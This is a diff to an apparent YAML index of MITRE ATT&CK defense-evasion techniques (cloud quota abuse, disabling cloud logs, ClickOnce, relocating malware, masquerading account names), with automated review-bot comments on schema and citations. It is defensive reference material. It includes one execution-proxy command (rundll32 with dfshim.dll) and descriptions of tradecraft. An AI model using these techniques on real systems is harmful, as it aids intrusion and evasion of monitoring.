name: Modify Cloud Compute Configurations
- description: |-
- Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victim’s compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim.
-
- For example, cloud providers often limit customer usage of compute resources via quotas. Customers may request adjustments to these quotas to support increased computing needs, though these adjustments may require approval from the cloud provider. Adversaries who compromise a cloud environment may similarly request quota adjustments in order to support their activities, such as enabling additional [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking 2023) Adversaries may also increase allowed resource usage by modifying any tenant-wide policies that limit the sizes of deployed virtual machines.(Citation: Microsoft Azure Policy)
-
- Adversaries may also modify settings that affect where cloud resources can be deployed, such as enabling [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535). In Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources, or engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant.(Citation: Microsoft Peach Sandstorm 2023) This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.(Citation: Microsoft Azure Policy) (Citation: Microsoft Subscription Hijacking 2022)
+ description: "Adversaries may modify settings that directly affect the size,
+ locations, and resources available to cloud compute infrastructure in order
+ to evade defenses. These settings may include service quotas, subscription
+ associations, tenant-wide policies, or other configurations that impact available
+ compute. Such modifications may allow adversaries to abuse the victim’s compute
+ resources to achieve their goals, potentially without affecting the execution
+ of running instances and/or revealing their activities to the victim.\n\nFor
+ example, cloud providers often limit customer usage of compute resources via
+ quotas. Customers may request adjustments to these quotas to support increased
+ computing needs, though these adjustments may require approval from the cloud
+ provider. Adversaries who compromise a cloud environment may similarly request
+ quota adjustments in order to support their activities, such as enabling additional
+ [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising
+ suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking
+ 2023) Adversaries may also increase allowed resource usage by modifying any
+ tenant-wide policies that limit the sizes of deployed virtual machines.(Citation:
+ Microsoft Azure Policy)\n\nAdversaries may also modify settings that affect
+ where cloud resources can be deployed, such as enabling [Unused/Unsupported
+ Cloud Regions](https://attack.mitre.org/techniques/T1535). "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
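Review bot: the T1578.005 description loses its third-paragraph content about Azure Global Administrator subscription creation and subscription hijacking, which is a substantive change rather than a reformat, so the 2.0 version bump in the next hunk is appropriate. Two presentation points: the scalar switches from `|-` block style to a double-quoted folded string, and the new string ends with a trailing space before the closing quote (`Cloud Regions](...). "`), which the quoted style now preserves in the parsed value; strip it if the generator allows. The dropped `(Citation: Microsoft Peach Sandstorm 2023)` and `(Citation: Microsoft Subscription Hijacking 2022)` keys are removed from `external_references` in the hunk below, so the citations stay consistent.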
@@ -11532,7 +11677,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- x_mitre_version: '1.0'
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Modification'
type: attack-pattern
@@ -11544,20 +11689,11 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1578/005
external_id: T1578.005
- - source_name: Microsoft Subscription Hijacking 2022
- description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
- using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
- url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
- source_name: Microsoft Cryptojacking 2023
description: 'Microsoft Threat Intelligence. (2023, July 25). Cryptojacking:
Understanding and defending against cloud compute resource abuse. Retrieved
September 5, 2023.'
url: https://www.microsoft.com/en-us/security/blog/2023/07/25/cryptojacking-understanding-and-defending-against-cloud-compute-resource-abuse/
- - source_name: Microsoft Peach Sandstorm 2023
- description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
- password spray campaigns enable intelligence collection at high-value targets.
- Retrieved September 18, 2023.
- url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
- source_name: Microsoft Azure Policy
description: Microsoft. (2023, August 30). Azure Policy built-in policy definitions.
Retrieved September 5, 2023.
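Review bot: removing these two references matches the trimmed description; grep the remaining fields of this object that are not shown in the hunk (notably `x_mitre_detection`) for `(Citation: Microsoft Subscription Hijacking 2022)` and `(Citation: Microsoft Peach Sandstorm 2023)` so no dangling citation key survives after the reference entries are gone.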
@@ -11566,11 +11702,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.008:
technique:
- modified: '2024-04-12T21:13:56.431Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Impair Defenses: Disable Cloud Logs'
description: |-
An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.
@@ -11579,6 +11714,7 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
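Review bot: `x_mitre_attack_spec_version: 3.2.0` is inserted between `kill_chain_phases` and `x_mitre_contributors`, i.e. in alphabetical key order, and the matching deletion of the old line appears in the last hunk of this object, so this is a pure relocation with no semantic change. The inconsistency is that T1562.008 is now emitted in alphabetical order while neighbouring objects keep their original key order, which makes future diffs noisier; letting the generator use one ordering for all objects would avoid that.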
@@ -11588,6 +11724,7 @@ defense-evasion:
- Janantha Marasinghe
- Matt Snyder, VMware
- Joe Gumke, U.S. Bank
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Monitor logs for API calls to disable logging. In AWS, monitor
for: StopLogging
and DeleteTrail
.(Citation: Stopping
@@ -11599,13 +11736,13 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- SaaS
- - Google Workspace
- - Azure AD
- - Office 365
- x_mitre_version: '2.0'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Modification'
- 'User Account: User Account Modification'
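Review bot: `Google Workspace`, `Azure AD` and `Office 365` collapse to `Office Suite` plus `Identity Provider` with a 2.0 to 2.1 bump for T1562.008, matching the first hunk in this series. As with T1550.004 and T1656, derived per-platform indexes keyed on the old names will drop this technique and need regenerating alongside this file.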
@@ -11650,9 +11787,6 @@ defense-evasion:
url: https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/detection__disruption/main.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.008
atomic_tests: []
T1564.003:
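Review bot: the three deletions here are the tail of the relocation for T1562.008: `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` are re-added earlier in the object in the two preceding hunks, so only `spec_version` is actually gone, consistent with the rest of the patch. Nothing further to change, but this is the pattern the T1036.001-area hunk above should be checked against.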
@@ -11735,18 +11869,140 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.003
atomic_tests: []
+ T1127.002:
+ technique:
+ modified: '2024-10-17T18:50:41.474Z'
+ name: ClickOnce
+ description: |-
+ Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.(Citation: Burke/CISA ClickOnce BlackHat) ClickOnce is a deployment that enables a user to create self-updating Windows-based .NET applications (i.e, .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application.(Citation: SpectorOps Medium ClickOnce)
+
+ Because ClickOnce applications receive only limited permissions, they do not require administrative permissions to install.(Citation: Microsoft Learn ClickOnce) As such, adversaries may abuse ClickOnce to proxy execution of malicious code without needing to escalate privileges.
+
+ ClickOnce may be abused in a number of ways. For example, an adversary may rely on [User Execution](https://attack.mitre.org/techniques/T1204). When a user visits a malicious website, the .NET malware is disguised as legitimate software and a ClickOnce popup is displayed for installation.(Citation: NetSPI ClickOnce)
+
+ Adversaries may also abuse ClickOnce to execute malware via a [Rundll32](https://attack.mitre.org/techniques/T1218/011) script using the command `rundll32.exe dfshim.dll,ShOpenVerbApplication1`.(Citation: LOLBAS /Dfsvc.exe)
+
+ Additionally, an adversary can move the ClickOnce application file to a remote user’s startup folder for continued malicious code deployment (i.e., [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001)).(Citation: Burke/CISA ClickOnce BlackHat)(Citation: Burke/CISA ClickOnce Paper)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Wirapong Petshagun
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Command: Command Execution'
+ - 'Process: Process Metadata'
+ - 'Module: Module Load'
+ x_mitre_system_requirements:
+ - ".NET Framework"
+ type: attack-pattern
+ id: attack-pattern--cc279e50-df85-4c8e-be80-6dc2eda8849c
+ created: '2024-09-09T14:39:28.637Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1127/002
+ external_id: T1127.002
+ - source_name: LOLBAS /Dfsvc.exe
+ description: LOLBAS. (n.d.). /Dfsvc.exe. Retrieved September 9, 2024.
+ url: https://lolbas-project.github.io/lolbas/Binaries/Dfsvc/
+ - source_name: Microsoft Learn ClickOnce
+ description: Microsoft. (2023, September 14). ClickOnce security and deployment.
+ Retrieved September 9, 2024.
+ url: https://learn.microsoft.com/en-us/visualstudio/deployment/clickonce-security-and-deployment?view=vs-2022
+ - source_name: SpectorOps Medium ClickOnce
+ description: 'Nick Powers. (2023, June 7). Less SmartScreen More Caffeine:
+ (Ab)Using ClickOnce for Trusted Code Execution. Retrieved September 9, 2024.'
+ url: https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5
+ - source_name: NetSPI ClickOnce
+ description: Ryan Gandrud. (2015, March 23). All You Need Is One – A ClickOnce
+ Love Story. Retrieved September 9, 2024.
+ url: https://www.netspi.com/blog/technical-blog/adversary-simulation/all-you-need-is-one-a-clickonce-love-story/
+ - source_name: Burke/CISA ClickOnce Paper
+ description: William J. Burke IV. (n.d.). Appref-ms Abuse for Code Execution
+ & C2. Retrieved September 9, 2024.
+ url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended-wp.pdf?_gl=1*1jv89bf*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.256219723.1512103758.1724809895-1999078900.1724809894
+ - source_name: Burke/CISA ClickOnce BlackHat
+ description: 'William Joseph Burke III. (2019, August 7). CLICKONCE AND YOU’RE
+ IN: When .appref-ms abuse is operating as intended. Retrieved September
+ 9, 2024.'
+ url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended.pdf?_gl=1*16njas6*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.253743689.1512103758.1724809895-1999078900.1724809894
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1070.010:
+ technique:
+ modified: '2024-10-13T15:48:46.391Z'
+ name: Relocate Malware
+ description: |-
+ Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with [File Deletion](https://attack.mitre.org/techniques/T1070/004) to cleanup older artifacts.
+
+ Relocating malware may be a part of many actions intended to evade defenses. For example, adversaries may copy and rename payloads to better blend into the local environment (i.e., [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: DFIR Report Trickbot June 2023) Payloads may also be repositioned to target [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012) as well as specific locations associated with establishing [Persistence](https://attack.mitre.org/tactics/TA0003).(Citation: Latrodectus APR 2024)
+
+ Relocating malicious payloads may also hinder defensive analysis, especially to separate these payloads from earlier events (such as [User Execution](https://attack.mitre.org/techniques/T1204) and [Phishing](https://attack.mitre.org/techniques/T1566)) that may have generated alerts or otherwise drawn attention from defenders.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Matt Anderson, @nosecurething, Huntress
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'File: File Modification'
+ type: attack-pattern
+ id: attack-pattern--cc36eeae-2209-4e63-89d3-c97e19edf280
+ created: '2024-05-31T11:07:57.406Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1070/010
+ external_id: T1070.010
+ - source_name: Latrodectus APR 2024
+ description: 'Proofpoint Threat Research and Team Cymru S2 Threat Research.
+ (2024, April 4). Latrodectus: This Spider Bytes Like Ice . Retrieved May
+ 31, 2024.'
+ url: https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice
+ - source_name: DFIR Report Trickbot June 2023
+ description: The DFIR Report. (2023, June 12). A Truly Graceful Wipe Out.
+ Retrieved May 31, 2024.
+ url: https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1556.009:
technique:
- modified: '2024-04-18T20:53:46.175Z'
+ modified: '2024-09-16T16:54:47.595Z'
name: Conditional Access Policies
description: "Adversaries may disable or modify conditional access policies
to enable persistent access to compromised accounts. Conditional access policies
are additional verifications used by identity providers and identity and access
management systems to determine whether a user should be granted access to
- a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+ a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
denied access to applications based on their IP address, device enrollment
status, and use of multi-factor authentication.(Citation: Microsoft Conditional
Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
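Review bot: the two Burke/CISA reference URLs in the new T1127.002 block carry Google Analytics tracking parameters (`?_gl=1*...&_ga=...`) that are not part of the document location; the PDFs are addressed by the path before `?`, so strip the query string unless these are copied verbatim from upstream and the generator would simply re-add them. Both new objects also arrive with `x_mitre_detection: ''` while their data sources are populated (Process Creation, Command Execution, Process Metadata and Module Load for ClickOnce; File Modification for Relocate Malware), which presumably mirrors upstream and leaves the data-source lines as the hooks a detection engineer would key on, so that is fine to merge as is. The T1556.009 description edit from Azure AD to Entra ID correctly leaves the citation key `Microsoft Conditional Access` untouched, since that key is an identifier rather than display text.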
@@ -11779,10 +12035,9 @@ defense-evasion:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - SaaS
- IaaS
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Cloud Service: Cloud Service Modification'
@@ -11819,40 +12074,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1578.002:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
- type: attack-pattern
- created: '2020-05-14T14:45:15.978Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1578.002
- url: https://attack.mitre.org/techniques/T1578/002
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: AWS CloudTrail Search
- url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
- description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
- Retrieved June 17, 2020.
- - source_name: Azure Activity Logs
- url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
- description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
- 2020.
- - source_name: Cloud Audit Logs
- url: https://cloud.google.com/logging/docs/audit#admin-activity
- description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-30T13:28:37.416Z'
name: Create Cloud Instance
description: |-
An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)
@@ -11861,20 +12086,50 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
+ x_mitre_deprecated: false
x_mitre_detection: |-
The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.
In AWS, CloudTrail logs capture the creation of an instance in the RunInstances
event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances create
to create a VM.(Citation: Cloud Audit Logs)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Instance: Instance Creation'
- 'Instance: Instance Metadata'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
+ created: '2020-05-14T14:45:15.978Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1578/002
+ external_id: T1578.002
+ - source_name: AWS CloudTrail Search
+ description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+ Retrieved June 17, 2020.
+ url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+ - source_name: Cloud Audit Logs
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: Azure Activity Logs
+ description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+ 2020.
+ url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.009:
technique:
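Review bot: the Mandiant M-Trends 2020 reference moves from content.fireeye.com to www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf while keeping the April 24, 2020 retrieval date; a retrieval date that predates the 2021-09 path is slightly odd, so whoever checks links should confirm the new URL resolves, since the old one is removed in the preceding hunk. The rest of this hunk (contributor, `x_mitre_deprecated`, domains, platforms, version 1.2, `x_mitre_permissions_required: - User` dropped, spec version 3.2.0) matches the shape of the other fully rebuilt objects, and the reordering of `external_references` is harmless.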
@@ -11904,7 +12159,7 @@ defense-evasion:
url: http://man7.org/linux/man-pages/man1/dd.1.html
description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
February 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-06-20T22:25:55.331Z'
name: Proc Memory
description: "Adversaries may inject malicious code into processes via the /proc
filesystem in order to evade process-based defenses as well as possibly elevate
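Review bot: `modified` for T1055.009 moves backwards, from '2021-04-29T14:49:39.188Z' to '2020-06-20T22:25:55.331Z', and the same happens to T1601.001 (2021-04-29 to 2020-10-22) and T1070.009 (2023-05-09 to 2023-04-11) below. Nothing else in those objects changes, and the old values share the same `.188Z` millisecond suffix across unrelated objects, so this reads as upstream restoring each object's own last-modified stamp in place of a release-wide timestamp rather than an older bundle being pulled in; a sentence to that effect in the PR description would save the next reader from wondering.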
@@ -11947,8 +12202,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1601.001:
technique:
@@ -11995,7 +12248,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T17:50:46.560Z'
name: Patch System Image
description: "Adversaries may modify the operating system of a network device
to introduce new capabilities or weaken existing defenses.(Citation: Killing
@@ -12061,12 +12314,10 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1070.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T22:30:01.227Z'
name: Clear Persistence
description: |-
Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)
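Review bot: `x_mitre_permissions_required: - Administrator` is left in place for T1601.001 (the two context lines above the removed `spec_version`), whereas the same key is removed from T1578.002, T1556.001 and T1556.005 elsewhere in this patch. Either upstream still carries the field on this older object, or the generator only strips it when it rebuilds an object in full; worth confirming so the index does not end up mixing two schemas.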
@@ -12121,33 +12372,84 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
- T1556.001:
+ T1036.010:
technique:
- x_mitre_platforms:
- - Windows
+ modified: '2024-10-17T15:20:36.705Z'
+ name: Masquerade Account Name
+ description: "Adversaries may match or approximate the names of legitimate accounts
+ to make newly created ones appear benign. This will typically occur during
+ [Create Account](https://attack.mitre.org/techniques/T1136), although accounts
+ may also be renamed at a later date. This may also coincide with [Account
+ Access Removal](https://attack.mitre.org/techniques/T1531) if the actor first
+ deletes an account before re-creating one with the same name.(Citation: Huntress
+ MOVEit 2023)\n\nOften, adversaries will attempt to masquerade as service accounts,
+ such as those associated with legitimate software, data backups, or container
+ cluster management.(Citation: Elastic CUBA Ransomware 2022)(Citation: Aquasec
+ Kubernetes Attack 2023) They may also give accounts generic, trustworthy names,
+ such as “admin”, “help”, or “root.”(Citation: Invictus IR Cloud Ransomware
+ 2024) Sometimes adversaries may model account names off of those already existing
+ in the system, as a follow-on behavior to [Account Discovery](https://attack.mitre.org/techniques/T1087).
+ \ \n\nNote that this is distinct from [Impersonation](https://attack.mitre.org/techniques/T1656),
+ which describes impersonating specific trusted individuals or organizations,
+ rather than user or service account names. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Menachem Goldstein
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - SaaS
+ - IaaS
+ - Containers
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'User Account: User Account Creation'
type: attack-pattern
- created: '2020-02-11T19:05:02.399Z'
+ id: attack-pattern--d349c66e-18e1-4d8b-a2d7-65af7cbd2ba0
+ created: '2024-08-05T21:39:16.274Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1556.001
- url: https://attack.mitre.org/techniques/T1556/001
- - source_name: Dell Skeleton
- description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
- Retrieved April 8, 2019.
- url: https://www.secureworks.com/research/skeleton-key-malware-analysis
- - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
- description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
- June 3, 2016.
- source_name: TechNet Audit Policy
- modified: '2022-04-25T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1036/010
+ external_id: T1036.010
+ - source_name: Elastic CUBA Ransomware 2022
+ description: Daniel Stepanic, Derek Ditch, Seth Goodwin, Salim Bitam, Andrew
+ Pease. (2022, September 7). CUBA Ransomware Campaign Analysis. Retrieved
+ August 5, 2024.
+ url: https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis
+ - source_name: Invictus IR Cloud Ransomware 2024
+ description: Invictus IR. (2024, January 11). Ransomware in the cloud. Retrieved
+ August 5, 2024.
+ url: https://www.invictus-ir.com/news/ransomware-in-the-cloud
+ - source_name: Huntress MOVEit 2023
+ description: John Hammond. (2023, June 1). MOVEit Transfer Critical Vulnerability
+ CVE-2023-34362 Rapid Response. Retrieved August 5, 2024.
+ url: https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response
+ - source_name: Aquasec Kubernetes Attack 2023
+ description: Michael Katchinskiy, Assaf Morag. (2023, April 21). First-Ever
+ Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved July 14,
+ 2023.
+ url: https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1556.001:
+ technique:
+ modified: '2024-08-21T15:26:54.386Z'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
